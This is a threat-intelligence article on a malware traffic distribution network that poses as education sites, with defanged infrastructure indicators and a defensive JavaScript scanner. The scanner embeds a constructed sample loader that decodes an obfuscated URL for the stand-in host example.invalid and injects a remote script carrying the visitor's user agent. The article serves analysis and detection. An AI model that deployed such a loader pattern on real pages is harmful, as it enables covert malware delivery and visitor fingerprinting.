Security researchers have discovered a sophisticated traffic distribution network that delivers malware and phishing attacks through phony education-themed domains. The operation, which is tracked under infrastructure indicators that point to TOXICSNAKE, tricks users into visiting malicious websites by borrowing the branding of reputable universities and educational institutions.
Cybercriminals running commodity malware-as-a-service operations can use this tactic as an effective social-engineering vector, taking advantage of the trust users place in educational platforms. The campaign is built on a multi-stage delivery mechanism intended to serve victims phishing content, malware and scam landing pages. Initial access occurs when users encounter falsely branded landing pages that imitate real educational institutions; as soon as a visitor lands on one of these phony education portals, obfuscated JavaScript in the page starts the infection chain in the browser.
The first-stage loader contains a hidden decoder that builds a remote URL and injects malicious code into the page, while also storing a one-time execution flag in browser storage so that the injection runs only once per visitor and avoids repeated detection. Macs-Hit analysts identified the malware infrastructure after recovering a JavaScript loader from the domain toxicsnake-wifes[.]com, which acts as a traffic distribution system (TDS) node that routes victims toward different payloads based on their geographic location, device type and browser information.
The second stage attempts to retrieve upstream payloads; during the investigation, however, researchers received HTTP 504 errors, indicating that the upstream infrastructure was either inactive or blocked at the time of analysis.
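As an added example (not the recovered loader and not the researchers' code), the following JavaScript scores a page script for the loader traits described above (a browser-storage flag, dynamic script injection, string decoding, client fingerprinting) and decodes String.fromCharCode-encoded literals so the contacted host can be read out and defanged for a report. The two sample scripts, the indicator weights and the reserved example.invalid host are constructed for this example.

```javascript
// Added example: static triage of page JavaScript for the loader traits the
// article describes. Not the recovered loader; all sample scripts are constructed.

// Each indicator is a trait of the described first-stage loader. Weights are
// an assumption for this example, not figures from the research.
const INDICATORS = [
  { name: "browser-storage flag",     weight: 2, re: /\b(localStorage|sessionStorage)\s*\.\s*(setItem|getItem)\s*\(/ },
  { name: "dynamic script injection", weight: 3, re: /createElement\s*\(\s*['"]script['"]\s*\)/ },
  { name: "string decoding",          weight: 2, re: /\b(atob|String\.fromCharCode|unescape)\s*\(/ },
  { name: "client fingerprinting",    weight: 1, re: /\bnavigator\s*\.\s*(userAgent|platform|language|plugins)\b/ },
  { name: "eval-style execution",     weight: 2, re: /\b(eval|Function)\s*\(/ },
];
const SUSPICIOUS_THRESHOLD = 5; // assumption: storage flag plus script injection alone warrants review

// Scores a script and lists which indicators fired.
function scanScript(src) {
  const fired = INDICATORS.filter(ind => ind.re.test(src));
  const score = fired.reduce((sum, ind) => sum + ind.weight, 0);
  return { score, hits: fired.map(ind => ind.name), suspicious: score >= SUSPICIOUS_THRESHOLD };
}

// Decodes every String.fromCharCode(...) literal so an encoded host can be read.
function decodeCharCodeLiterals(src) {
  const re = /String\.fromCharCode\s*\(([\d\s,]+)\)/g;
  const decoded = [];
  let m;
  while ((m = re.exec(src)) !== null) {
    decoded.push(m[1].split(",").map(n => String.fromCharCode(parseInt(n, 10))).join(""));
  }
  return decoded;
}

// Defangs a URL or host for safe inclusion in a report.
function defang(s) {
  return s.replace(/^http/i, "hxxp").replace(/\./g, "[.]");
}

// Constructed sample resembling the described loader (host is the reserved example.invalid).
const SAMPLE_LOADER = `
(function () {
  if (localStorage.getItem("_edu_seen")) return;       // one-time execution flag
  localStorage.setItem("_edu_seen", "1");
  var h = String.fromCharCode(104,116,116,112,115,58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100);
  var s = document.createElement("script");             // remote URL assembled, then injected
  s.src = h + "/t.js?u=" + encodeURIComponent(navigator.userAgent);
  document.head.appendChild(s);
})();
`;

// Constructed benign sample: ordinary page code with none of the traits.
const SAMPLE_BENIGN = `
document.addEventListener("DOMContentLoaded", function () {
  document.getElementById("courses").textContent = "Welcome";
});
`;

// Runs both samples through the scanner and recovers the loader's contact host.
function triageSamples() {
  return {
    loader: scanScript(SAMPLE_LOADER),
    benign: scanScript(SAMPLE_BENIGN),
    loaderHosts: decodeCharCodeLiterals(SAMPLE_LOADER).map(defang),
  };
}

console.log(JSON.stringify(triageSamples(), null, 2));
```

The scanner is deliberately static: it never executes the script, so the one-time flag and any sandbox-aware branching in a real loader cannot hide the traits from it. It will miss loaders that build their strings with other encoders, so treat the indicator list as a starting point to extend from recovered samples.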
According to the investigation, this is a coordinated cluster of domains with shared operational security patterns rather than an isolated incident. Related domains that share the same infrastructure and education-themed branding include pasangiklan[.]top, asangiklan[.]top, ourasolid[.]com, refanprediction[.]shop and xelesex[.]top.
Infrastructure and Evasion Strategies

The entire operation runs on bulletproof hosting, particularly HZ Hosting Ltd (AS202015), which maintains a permissive abuse policy. The malicious domains use Regway nameservers and are registered with disposable WHOIS information, a common practice among cybercriminals operating in the CIS. To avoid broad IP-based blocking, each domain is assigned a dedicated IP address, and all of them resolve to addresses within the 185.33.84.0/23 netblock. For defenders this means a block on any single IP is quickly outlived by rotation; a netblock-level block, or a reputation rule keyed on the hosting AS, is the more durable control.
The attackers use automated certificate issuance through Let's Encrypt, obtaining free TLS certificates valid for ninety days, which supports rapid infrastructure rotation and domain replacement. The obfuscated JavaScript loader also uses tokenization to generate a unique session identifier for each visitor, serving benign content to recognised analysis environments while delivering the real payloads to actual victims, so that security sandboxes cannot observe the threat accurately. A caveat for analysts follows from this: a first visit from a sandbox may look clean, and because the loader sets a one-time flag in browser storage, a repeat visit from the same browser profile will not re-trigger it. Reproducing the chain needs a fresh profile and a realistic client fingerprint on every attempt.